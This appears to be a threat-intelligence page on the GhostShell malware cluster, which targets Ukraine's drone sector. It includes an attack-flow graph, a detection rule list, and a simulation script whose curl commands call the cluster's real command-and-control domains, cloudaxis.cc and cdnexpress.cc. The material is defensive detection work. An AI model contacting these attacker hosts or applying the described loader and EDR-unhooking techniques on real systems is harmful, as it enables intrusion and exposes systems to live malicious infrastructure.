GhostShell (MB-0009): Targeting Ukraine’s UAV Operations and Defense Supply Chain
Follow 
Detection stack
- AIDR
- Alert
- ETL
- Query
Summary
A newly tracked threat cluster known as GhostShell is targeting Ukraine’s UAV and broader drone ecosystem. The operation uses advanced malware, including mTLS-authenticated implants and memory-resident loaders. To gain initial access, the attackers rely on decoy documents that impersonate a Ukrainian drone company.
Investigation
The analyst uncovered a multi-stage intrusion chain built around VBS scripts, mTLS-enabled implants such as 122.exe, and Telegram-based loaders including update.exe. Reverse engineering exposed custom XOR decryption logic, an embedded private PKI, and use of Xray Core for covert tunneling. The investigation also identified Vidar infostealer activity within the same infrastructure.
Mitigation
Organizations should enforce strict mTLS certificate validation and monitor for unauthorized use of client certificates. Endpoint visibility should be improved to detect in-memory loading, ntdll.dll unhooking, and suspicious changes to Windows Run key persistence. Teams should also watch for abnormal outbound traffic to known command-and-control domains and Telegram-driven configuration retrieval.
Response
Affected systems should be isolated immediately, followed by memory forensics to identify any in-memory implants. Network logs should be reviewed for traffic involving cloudaxis.cc and cdnexpress.cc. Security teams should also hunt for the referenced SHA-256 hashes and monitor for the specific mTLS client certificate CN=ed6e62814295701f.
"graph TB %% Class Definitions Section classDef action fill:#99ccff classDef tool fill:#cccccc classDef malware fill:#ff9999 classDef process fill:#ccffcc classDef network fill:#ffff99 classDef operator fill:#ff9900 %% Initial Access and Execution Phase action_phishing["<b>Action</b> – <b>T1566.001 Phishing: Spearphishing Attachment</b><br/>Description: Social engineering using decoy PDF documents<br/>impersonating Besomar to target UAV ecosystem."] class action_phishing action action_exploit["<b>Action</b> – <b>T1203 Exploitation for Client Execution</b><br/>Description: Exploiting CVE-2025-8088 and CVE-2025-6218<br/>via malicious archive Besomar_documentation.rar."] class action_exploit action process_vbs["<b>Process</b> – <b>T1059.005 Command and Scripting Interpreter: Visual Basic</b><br/>Description: VBS file dropped into Windows Startup folder<br/>executing Base64-encoded strings via ExecuteGlobal."] class process_vbs process %% Persistence and Payload Download action_persistence_startup["<b>Action</b> – <b>T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder</b><br/>Description: VBS file placed in Startup folder for persistence."] class action_persistence_startup action network_download["<b>Network</b> – <b>T1105 Ingress Tool Transfer</b><br/>Description: Downloading secondary payloads from cloudaxis.cc."] class network_download network op_branch(("AND")) class op_branch operator %% Path 1: 122.exe malware_122["<b/>Name: 122.exe<br/>Description: Loader that decrypts an embedded PE using XOR<br/>and executes it in memory."] class malware_122 malware action_fingerprint["<b/>Action: Host Fingerprinting<br/>Description: Collecting computer name, username, and PID."] class action_fingerprint action network_c2_122["<b/>C2 Communication: cdnexpress.cc<br/>Description: Uses unique mTLS client certificate for authentication."] class network_c2_122 network action_screen_cap["<b/>Action: Screen Capture<br/>Description: Capturing screens via GDI+."] class action_screen_cap action action_persistence_reg["<b/>Action: Registry Run Keys<br/>Description: Establishing persistence via Windows Registry Run keys."] class action_persistence_reg action %% Path 2: update.exe malware_update["<b/>Name: update.exe<br/>Description: In-memory loader retrieving C2 config from Telegram."] class malware_update malware action_anti_analysis["<b/>Action: <b>T1562.001 Impair Defenses: Disable or Modify Tools</b><br/>Description: Unhooking EDR/monitoring tools by patching ntdll.dll."] class action_anti_analysis action action_metasploit_stager["<b/>Action: <b>T1059.003 Command and Scripting Interpreter: Windows Command Shell</b><br/>Description: Executes a Metasploit-style HTTPS stager in memory."] class action_metasploit_stager action %% Path 3: 22.exe and Vidar malware_22["<b/>Name: 22.exe<br/>Description: Multi-stage launcher utilizing Xray Core client."] class malware_22 malware network_vless["<b/>Network: <b>T1573 Encrypted Channel</b><br/>Description: Tunneling traffic via a VLESS connection."] class network_vless network malware_vidar["<b/>Name: Vidar Malware<br/>Description: Credential and data theft tool targeting browser<br/>passwords, cookies, wallets, and messaging artifacts."] class malware_vidar malware %% Connection Logic action_phishing –>|leads_to| action_exploit action_exploit –>|results_in| process_vbs process_vbs –>|uses| action_persistence_startup action_persistence_startup –>|triggers| network_download network_download –>|delivers| op_branch %% Branching to payloads op_branch –>|payload_1| malware_122 op_branch –>|payload_2| malware_update op_branch –>|payload_3| malware_22 %% 122.exe flow malware_122 –>|performs| action_fingerprint malware_122 –>|communicates_with| network_c2_122 malware_122 –>|capable_of| action_screen_cap malware_122 –>|ensures| action_persistence_reg %% update.exe flow malware_update –>|retrieves_config_from| action_anti_analysis action_anti_analysis –>|executes| action_metasploit_stager %% 22.exe flow malware_22 –>|tunnels_via| network_vless network_vless –>|deploys| malware_vidar "
Attack Flow
Detections
Short File Name (via cmdline)
View
LOLBAS WScript / CScript (via process_creation)
View
Suspicious CURL Usage (via cmdline)
View
Suspicious Binary / Scripts in Autostart Location (via file_event)
View
Possible Telegram Abuse As Command And Control Channel (via dns_query)
View
Possible CVE-2025-8088 / CVE-2025-6218 (WinRAR Vulnerability) Exploitation Attempt (via file_event)
View
Suspicious Command and Control by Unusual Top Level Domain (TLD) DNS Request (via dns)
View
Detect Communication and Payload Download from GhostShell Infrastructure [Windows Network Connection]
View
GhostShell Malware Persistence via Startup Folder [Windows File Event]
View
Simulation Execution
Prerequisite: The Telemetry & Baseline Pre-flight Check must have passed.
Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic. Abstract or unrelated examples will lead to misdiagnosis.
-
Attack Narrative & Commands: The adversary has gained an initial foothold and is attempting to pull down a specialized payload (
122.exe) to solidify control over the target. To maintain a low profile, the malware uses a hijacked or seemingly legitimate-looking CDN domain (cloudaxis.cc). Following the download, the malware attempts to “heartbeat” or send telemetry back to the C2 infrastructure via a specific analytics endpoint (cdnexpress.cc/analytics). The simulation will usecurlto mimic these specific GET requests to trigger the URI-based detection logic. -
Regression Test Script:
# Simulation of GhostShell Payload Download Write-Host "[+] Simulating GhostShell Payload Download..." curl.exe -I "https://cloudaxis.cc/gsmft/yueu/fkvqld/tvqqwh/ushu/122.exe" # Simulation of GhostShell C2 Communication (Analytics) Write-Host "[+] Simulating GhostShell C2 Communication..." curl.exe -I "https://cdnexpress.cc/analytics" -
Cleanup Commands:
# No files are actually downloaded in this simulation (using -I for headers only) # No persistent changes are made to the system. Write-Host "[+] Simulation complete. No cleanup required."